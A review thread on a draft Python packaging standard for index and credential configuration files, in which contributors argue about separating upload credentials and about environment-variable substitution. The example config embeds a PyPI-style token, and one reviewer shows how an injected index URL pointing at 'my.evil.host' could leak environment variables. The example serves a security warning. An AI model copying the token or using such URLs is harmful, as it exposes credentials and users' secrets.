pep-9999.rst

```diff
@@ -0,0 +1,284 @@
+PEP: 9999
+Title: Specifying Package index configuration
+Author: Fredrik Averpil <fredrik at averpil.com>
+Status: Draft
+Type: Informational
+Created: 05-May-2021
+Post-History: <dates of postings to python-ideas and/or python-dev>
+
+
+Abstract
+========
+
+This PEP specifies how Python package index configuration should be configured independent of the client tools using them. As part of this specification, a new configuration file is introduced for client tools to use to read index specific configuration. 
+
+We idenitfy a Package index as a service that implements the JSON API and/or Legacy API as described by the Warehouse [1]_ project (like PyPI.org [2]_) . In the future, this can be extended to support other package sources like link soruces (html).
+
+
+Motivation
+==========
+
+Workflow tools come up with their own configuration mechanisms for Python package
+indexes, as there is no standard for this. This causes fragmentation and
+pain points.
+
+Examples of such configuration files:
+
+* Pip's ``pip.conf`` and ``pip.ini``
+* Packaging's ``.pypirc`` (also used by tools like Flit and Twine)
+* Poetry's ``config.toml`` and ``auth.toml``
+
+
+Rationale
+=========
+
+While this PEP aim to come up with a unified Python package index configuration,
+thought has been given so to be able to extend the configuration later. For example,
+Warehouse [1]_ repositories are assumed in this PEP, but a ``type`` attribute could be
+introduced which would default to e.g. ``warehouse`` down the line, to allow for other
+package index types. Any tool could also start taking advantage of the fact that the
+configuration files and their discovery is a standard, and use this for their own
+configuration.
+
+
+Specification
+=============
+
+The specification consists of three parts: the configuration definition, package discovery and configuration file discovery.
+
+
+Configuration definition
+------------------------
+
+The configuration is split into two files:
+
+* ``config.toml`` for Python package index configuration
+* ``auth.toml`` for credentials
+
+
+The config.toml file
+''''''''''''''''''''
+
+Package index configuration is defined in the ``config.toml`` file::
+
+    [[package_indexes]]
+    name = "pypi"
+    url = "https://pypi.org/simple/"
+
+    [[package_indexes]]
+    name = "myrepo1"
+    url = "http://myserver2.org/simple"
+
+
+    [[credentials]]
+    package_index_name = "pypi"
+    username = "__token__"
+    password = "pypi-AgEIcHlwaS5vcmcCJDJjMmI5NDJmLWIzNzQtNDc3ZC04ZmRkLTM4NDEzY2M1ZTU5MAACJXsicGVybWlzc2lvbnMiOiAidXNlciIsICJ2ZXJzaW9uIjogMX0AAAYgV91r8iEUUz7Q5xbsfi_KGiO3wrJR2_IOOpnFyLo62bk"
```

Comment:
These are upload credentials, right? But how do you map the PEP 508 URL (pypi.org/simple/) to the upload URL (upload.pypi.org/legacy). That'll be different for each repository, if it even supports uploads.

I would have two sections:

1. PEP 508 repositories, and their credentials if required. I'd use the format you have currently.
2. Upload URLs, and their credentials. Almost all uploads with require auth, so I'd have a single table with the name, URL and credentials.

Something like

```toml
[[package_uploads]]
name = "testpypi"
url = "https://test.pypi.org/legacy"
username = "foo"
password = "YmFyCg=="
```

Reply:
Can we please make sure the syntax includes support for environment variables vice having to "hard code" creds into the proposed file? (Other vars could also benefit from env vars, so I'd be fine if any value assignment could reference a env var, but my assumption is this file could/would often be included in version control somehow so we want to avoid spills.)

Reply:
I forget the details, but there have been Opinions posted about this being supported in distutils/setuptools configuration files. It could probably be used for stealing credentials, but perhaps not in any way that isn't possible anyway.

Maybe add the support with a question mark and see what people say when this reaches public review.

Reply:
I've heard many of those arguments but don't think they hold up under scrutiny. While it's true that env var-based creds can be stolen, they also enable use of automation to create short-lived creds that greatly limit the blast radius of a compromise (using tools like `envconsul` or `summon` to grab creds from a secrets manager and inject them into the execution context). To me that's *vastly* superior to having long-lived creds hard-coded in a config file.

Reply:
@vadave do you have a suggestion on what this syntax could be like?

```toml
    [[package_indexes]]
    name = "pypi"
    url = "https://pypi.org/simple/"

    [[credentials]]
    package_index_name = "pypi"
    username_env = "MY_USERNAME_ENV"
    password_env = "MY_PASSWORD_ENV"
```

I take it that the env vars take precedence over any already specified `username` or `password` entries to the toml?

Reply:
> These are upload credentials, right?

@domdfcoding well, not necessarily. They can also be credentials to just grant read-only to e.g. private registries served by e.g. [Artifactory](https://www.jfrog.com/confluence/display/JFROG/PyPI+Repositories).

It has been brought up before, that we will have to separate download vs upload credentials, by e.g. @abn. Also, the download vs upload credentials can differ.

I'm thinking we could do something like this...

```toml
    [[package_indexes]]
    name = "pypi"
    url = "https://pypi.org/simple"

    [[package_indexes]]
    name = "testpypi"
    url = "https://test.pypi.org/legacy"

    [[credentials]]
    package_index_name = "pypi"
    username = "dl_user"
    password = "dl_pass"

    [[credentials]]
    package_index_name = "testpypi"
    username = "ul_user"
    password = "ul_pass"
```

What do you think?

Reply:
>@vadave do you have a suggestion on what this syntax could be like?

I'd rather not introduce "different" keys for env-var based values. Instead, I'd suggest a special syntax that signals the value should be pulled from the env. Something like: 
```toml
   [[package_indexes]]
    name = "testpypi"
    url = "https://test.pypi.org/legacy"

    [[credentials]]
    package_index_name = "testpypi"
    username = $("MY_USERNAME_ENV")
    password = $("MY_PASSWORD_ENV")
```
Or alternately you could have special syntax to trigger a "env var handler":
```toml
    username = env!("MY_USERNAME_ENV")
    password = env!("MY_PASSWORD_ENV")
```

This same syntax could be extended to support other types of references  (e.g. `include!("/path/to/file")` )

Reply:
> I've heard many of those arguments but don't think they hold up under scrutiny. While it's true that env var-based creds can be stolen, they also enable use of automation to create short-lived creds that greatly limit the blast radius of a compromise

I  was more thinking about the possibility of using this configuration file to steal other environment variables, by inducing a package manager to contact a particular server:

```
...
name = "my_server"
url = "https://my.evil.host/%LOGONSERVER%/"
```

Of course, if you manage to inject this kind of setting, you have plenty of alternative approaches, as I mentioned above (my fault for thinking a throwaway comment about security would be ignored in favour of my main point, which is that env variable substitutions in configuration files have been tried, failed, and deprecated before, so we should find out why before forging ahead).

Reply:
Agree that alternate approaches could just as easily grab and exfiltrate env vars, but also agree that it makes sense to limit this functionality to prevent grabbing any arbitrary env var, perhaps by requiring a certain prefix to the env vars used in this fashion. Maybe something like `PIVAR_` (package index variable)? 

This isn't 100% bulletproof, but does narrow the scope of the exposure. 

And I'm definitely interested in perspectives on why past approaches have been deprecated so we don't repeat the mistakes of the past. For my day job I'm neck-deep in cloud native/zero trust efforts, and env vars are widely used to inject those configs at runtime (using a variety of different tools depending on the particulars of the situation).